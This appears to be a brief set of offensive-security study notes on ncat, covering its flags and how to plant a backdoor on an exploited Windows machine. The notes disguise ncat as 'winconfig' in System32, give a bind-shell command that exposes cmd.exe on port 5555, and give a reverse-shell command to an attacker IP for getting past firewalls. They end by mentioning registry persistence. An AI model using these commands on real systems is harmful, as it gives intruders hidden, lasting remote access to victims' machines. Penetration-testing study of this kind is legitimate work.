1️⃣ncat

-l listen

-e execute

-p port

-v verbose

🚩 Setting a backdoor on an exploited windows machine

  1. upload same version ncat on exploited windows machine
  2. change the name to winconfig and move the executable to windows>system32

on the windows terminal

> winconfig -l -p 5555 -e cmd.exe

on attack machine

$ ncat <windows exploited machine> <port listening on>

WAIT!! What if there's a firewall and the victim is on an internal network??

→ switch the roles of attacker and victim

attacker (server)

$ ncat -l -p 5555 -v 

victim (client)

> winconfig -e cmd.exe <attacker ip> <port listening on>

🚩 Setting a persistent backdoor on windows exploited machine

by adding the necessary command key to the network registry